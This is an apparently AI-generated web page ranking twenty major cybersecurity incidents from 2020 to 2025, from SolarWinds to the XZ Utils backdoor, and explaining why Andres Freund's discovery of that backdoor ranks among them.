Top Cybersecurity Breaches 2020–2025 | Generated by AI
Question: What are the top 20 biggest security news stories in the last 5 years, and does the Andres Freund / XZ Utils SSH delay backdoor discovery count as one of them?
Answer:
Top 20 Biggest Cybersecurity News Stories (2020–2025)
1. 🔓 SolarWinds Supply Chain Attack (Dec 2020)
Beginning in February 2020, a threat actor (later confirmed to be Russia’s Foreign Intelligence Service) injected trojanized code into SolarWinds’ Orion software updates. SolarWinds released the compromised updates to its customers unknowingly, providing the threat actor with a backdoor — a program granting remote access to infected computers. SolarWinds estimates nearly 18,000 of its customers received a compromised software update. This is widely considered one of the most devastating cyber-espionage campaigns in history, compromising U.S. government agencies and Fortune 500 companies.
2. ⛽ Colonial Pipeline Ransomware (May 2021)
Colonial Pipeline was shut down on May 6 by a ransomware attack by DarkSide. The pipeline stretches from Texas to the Northeast, delivering about 45% of the fuel consumed by the East Coast. Reuters reported that the hackers stole more than 100 GB of data. The company paid $5 million in Bitcoin, $2.3 million of which was recovered by the U.S. government. The attack triggered widespread fuel shortages and a national emergency declaration.
3. 🪵 Log4Shell / Log4j Vulnerability (Dec 2021)
A zero-day vulnerability in the Log4j Java library, known as Log4Shell, allowed hackers to remotely execute code on machines running Log4j version 2.0 or higher. The problem lies in Log4j, a ubiquitous, open-source Apache logging framework that developers use to keep a record of activity within an application. All an attacker had to do to exploit Log4Shell was to send a malicious code string to the target system. With a CVSS score of 10.0 and near-universal deployment in enterprise software, it was considered one of the most critical vulnerabilities ever discovered.
4. 🏥 Microsoft Exchange Server Vulnerabilities (Mar 2021)
Microsoft reported in March 2021 the exploitation of vulnerabilities in several versions of Microsoft Exchange Server, including versions that federal agencies hosted and used on-premises. According to a White House statement, malicious cyber actors affiliated with China’s Ministry of State Security conducted operations utilizing these Exchange vulnerabilities. The vulnerabilities initially allowed threat actors to make authenticated connections to Microsoft Exchange Servers from unauthorized external sources.
5. 🔑 Kaseya VSA Ransomware (Jul 2021)
On July 2, U.S. IT management software provider Kaseya was attacked by Russian hacking group REvil. Since Kaseya sells its software to IT departments and MSPs, those MSPs and their customers became potential secondary and tertiary targets. One of the hardest-hit was Swedish Coop grocery store, which had to close 800 stores because it couldn’t accept payments via cash registers.
6. 🔐 LastPass Data Breach (Aug–Dec 2022)
Global ransomware payments exceeded $1 billion for the first time in 2023 — and setting the stage was the 2022 LastPass breach. Attackers gained access to customer password vaults by first stealing developer credentials and then, months later, exploiting that access to exfiltrate encrypted vault data belonging to millions of users. It remains one of the most severe password manager breaches in history.
7. 🧩 Okta Repeated Breaches (2022–2023)
Okta experienced multiple breaches: in December 2022, source code was stolen after their GitHub repositories were hacked; in March 2022, hacker group LAPSUS$ revealed they had breached Okta’s systems by gaining “superuser/admin” privileges and posted screenshots of Okta’s backend administrative consoles and some customer data. Then in late 2023, the full scope of a new breach was revealed — hackers gained access to the files of 134 different customers and downloaded a report listing the names and email addresses of all customers who had used Okta support.
8. 💊 Change Healthcare Ransomware (Feb 2024)
Andrew Witty, CEO of Change Healthcare owner UnitedHealth Group, estimated in May 2024 that the fallout of the attack would affect roughly one-third of Americans. The Alphv/BlackCat gang, which had been disrupted by the FBI in December 2023, resumed operations and began aggressively targeting healthcare organizations in 2024. It caused massive disruption to U.S. healthcare billing and prescription systems for months.
9. ☁️ CrowdStrike Falcon Update Global IT Outage (Jul 2024)
CrowdStrike’s faulty Falcon channel file update caused a global IT outage in the summer of 2024 that affected millions of Windows machines and disrupted a number of critical organizations, including airlines. It was not a cyberattack but became the largest IT outage in history, grounding flights worldwide and affecting hospitals, banks, and broadcasters.
10. 📱 Salt Typhoon — U.S. Telecom Hack (2024)
Chinese hackers accessed phones used by senior U.S. political figures in October 2024. The FBI launched an investigation into the incident, raising election security concerns. Further reporting revealed Salt Typhoon had deeply penetrated AT&T, Verizon, and other major U.S. telecoms, intercepting calls and texts of government officials.
11. 🏦 MOVEit Transfer Mass Exploitation (Jun 2023)
The Cl0p ransomware gang exploited a zero-day vulnerability in MOVEit Transfer software, leading to data theft from hundreds of organizations worldwide — including government agencies, banks, and airlines. It became the largest single cyberattack campaign of 2023 affecting tens of millions of individuals.
12. 🎰 MGM Resorts / Caesars Casino Attacks (Sep 2023)
A cyberattack that shut down some of the top casinos in Las Vegas quickly became one of the most riveting security stories of 2023: it was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. MGM suffered over $100 million in losses; Caesars quietly paid a ransom.
13. 🌨️ Snowflake Cloud Breach (May 2024)
Cloud data platform Snowflake suffered a major breach in May 2024. It impacted over 100 customer organizations, including AT&T, Ticketmaster, and Santander Bank. Hackers linked to the Scattered Spider group gained unauthorized access by exploiting compromised employee credentials.
14. 📞 AT&T Data Breach (2024)
In July 2024, AT&T revealed that data from “nearly all” of its customers from May to October 2022 and January 2, 2023, was exfiltrated to a third-party platform in April. Threat actors accessed phone call and text message records, though not their content or any personally identifiable information. AT&T paid 5.7 Bitcoin — about $374,000 — to a threat actor to delete the stolen data.
15. 💰 Record $75M Ransom Payment — Dark Angels (2024)
Zscaler’s ThreatLabz team revealed that it identified a $75 million ransom payment made by an unnamed victim to the Dark Angels ransomware group — higher than any publicly known ransomware payment to date. In September, Bloomberg reported that Dark Angels received the record-setting payment for its attack on pharmaceutical giant Cencora, a publicly traded Fortune 500 company.
16. 🔐 LockBit Ransomware Takedown (Feb 2024)
The notorious ransomware group LockBit was subject to a law enforcement takedown in February 2024. The U.K. National Crime Agency’s Cyber Division, the FBI, and international partners cut off their website, which had been used as a large ransomware-as-a-service storefront. Despite being claimed as “completely compromised,” the group resumed operations at a different Dark Web address shortly after.
17. 🏛️ Microsoft Midnight Blizzard Breach (Jan 2024)
In January 2024, Microsoft disclosed that it had been a victim of a nation-state-backed attack beginning in November 2023. The Russian threat actor group Midnight Blizzard accessed some Microsoft corporate emails and documents through compromised email accounts. Midnight Blizzard gained access through a successful password spray attack on a legacy test tenant account without multi-factor authentication.
18. 🧬 23andMe Data Breach (Oct 2023)
Consumer genetics company 23andMe suffered credential-stuffing attacks that exposed data from up to 20 million profiles in October 2023. The stolen information included genetic ancestry data, with specific targeting of Ashkenazi Jewish users. The incident underscored the risks of password reuse and weak authentication controls.
19. 🏦 U.S. Treasury / Chinese Hackers Breach (Dec 2024)
Chinese hackers breached a third-party vendor for the U.S. Treasury Department to gain access to over 3,000 unclassified files. The breach, attributed to a state-sponsored group called Silk Typhoon, targeted the Treasury’s sanctions office (OFAC) and was considered a significant national security incident.
20. 🔧 XZ Utils Backdoor — CVE-2024-3094 (Mar 2024)
In February 2024, a malicious backdoor was introduced to the Linux build of the XZ utility within the liblzma library in versions 5.6.0 and 5.6.1 by an account using the name “Jia Tan.” The backdoor gives an attacker who possesses a specific Ed448 private key remote code execution through OpenSSH on the affected Linux system. The issue was assigned CVE-2024-3094 and given a CVSS score of 10.0, the highest possible score.
Does the XZ Utils / Andres Freund Story Count? ✅ Absolutely YES
This is arguably one of the most dramatic security discoveries of the decade. Here’s why it stands out:
The Discovery: Andres Freund was benchmarking PostgreSQL on Debian Sid when he noticed SSH logins taking 500ms instead of the normal 100ms. He investigated, found Valgrind errors pointing to liblzma, and traced the issue to malicious code in the XZ Utils release tarballs. He reported it to the Openwall Project security mailing list on 28 March 2024.
The Scope of the Near-Disaster: This backdoor almost became one of the most significant intrusion enablers ever — one that would have dwarfed the SolarWinds backdoor. The attackers were almost able to gain immediate access to any Linux machine running an infected distro, which includes Fedora, Ubuntu, and Debian.
The Long Game: A subsequent investigation found that the campaign to insert the backdoor was a culmination of approximately three years of effort, between November 2021 and February 2024, by a user going by the name “Jia Tan” to gain access to a position of trust within the project.
The Method: Jia Tan hid the malicious code in modified build-to-host.m4 and obfuscated binary test files within the tarball, ensuring standard code review of the Git repository would not detect it.
The Lucky Break: If Andres Freund had not noticed that half-second delay, you might be reading about the worst cybersecurity breach in human history. Most engineers would have shrugged it off — Freund did not.
The XZ Utils story is unique because it was both a near-miss catastrophe and a showcase of how open-source vigilance can catch even the most sophisticated state-level supply chain attacks.
References:
- CSIS Significant Cyber Incidents
- TechTarget: 10 Biggest Cybersecurity Stories of 2024
- XZ Utils Backdoor – Wikipedia
- Akamai: XZ Utils Backdoor – Everything You Need to Know
- SoftwareSeni: XZ Utils Backdoor and Multi-Year Social Engineering Campaign
- Internet Nearly Collapsed From XZ Backdoor – andrewbaker.ninja
- GAO: SolarWinds Cyberattack
- Fortinet: Recent Cyber Attacks
- TechRepublic: Cybersecurity News Roundup 2024